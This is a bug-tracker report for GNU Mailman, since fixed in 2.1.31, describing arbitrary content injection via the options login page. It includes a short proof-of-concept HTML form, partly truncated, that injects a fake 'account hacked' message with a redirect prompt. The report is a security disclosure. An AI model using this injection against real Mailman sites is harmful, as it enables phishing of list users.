Arbitrary Content Injection via the options login page.
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
GNU Mailman | Fix Released | Medium | Mark Sapiro | |
Bug Description
An issue similar to CVE - https:/
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>
<form action="https:/
<input type="hidden" name="email" value="
<input type="hidden" name="UserOptions" value="
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to https:/
Changed in mailman:
milestone: none → 2.1.31

Changed in mailman:
status: Confirmed → Fix Released
information type: Private Security → Public